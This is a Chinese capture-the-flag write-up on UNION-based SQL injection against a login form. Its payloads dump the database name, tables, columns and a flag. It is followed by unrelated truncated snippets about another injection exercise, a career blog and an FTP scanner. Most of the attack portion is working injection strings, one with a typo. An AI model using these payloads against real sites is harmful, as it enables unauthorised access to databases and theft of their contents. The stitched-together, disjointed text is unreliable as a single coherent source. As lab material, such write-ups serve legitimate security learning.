1、開啟題目鏈結,是乙個登入介面,抓包後傳資料進行嘗試
2、嘗試資料
3、判斷回顯位置
admin_name=1" union select 1%23&admin_passwd=1&submit=go+go+go
再改payload為
admin_name=1" union select 1,2%23&admin_passwd=1&submit=go+go+go
得到
發現回顯位置在login_name那裡(不要被後面那句話迷惑了。。)
4、爆資料庫名
admin_name=1" union select database(),2%23&admin_passwd=1&submit=go+go+go
得到bugkusql1
5、爆表名
admin_name=1" union select (select table_name from information_schema.tables where table_schema=database() limit 0,1),2%23&admin_passwd=1&submit=go+go+go
得到flag1
改limit 0,1為limt 1,1 得到whoami6、爆欄位
admin_name=1" union select (select column_name from information_schema.columns where table_name='flag1'),2%23&admin_passwd=1&submit=go+go+go
得到flag1
7、flag
admin_name=1" union select (select flag1 from flag1),2%23&admin_passwd=1&submit=go+go+go
得到ed6b28e684817d9efcaf802979e57ae 這是乙個神奇的對話方塊
輸入0 發現報錯 確定可以注入,判斷欄位有多少個 0 order by 1,2,3 發現 說明有兩列。輸入 0 union select database 2 得到庫名 繼續輸入 0 union select table name,2 from information schema.tables w...
這是乙個開始
準備正式的應對職業之路,是從劉未鵬的部落格開始 在此之前,從事的工作比較漫不經心,因為不熱愛的緣故,也只是工作而已 經朋友推薦,瀏覽了劉的部落格,一下仿似給自己找到了乙個出口。長期以來自己不成條理,漫無目標的思考,找到了乙個可以依附的體系 在新下來的日子裡,我認真的做事,努力學習周邊,在漂亮完成兩個...
這是乙個Scanner
最近,老師讓寫乙個ftp掃瞄器並匿名登陸。要求掃瞄到所有的檔案。預備知識 ftplib的使用 python異常處理知識 字串處理技巧 牽扯到拼接路徑 遞迴程式設計技巧 需要用遞迴來遍歷所有檔案 思路通過思考問題,我設計的遞迴引數是將父目錄當作引數。這個是肯定存在的。所以不需要進行異常處理 有以下幾種...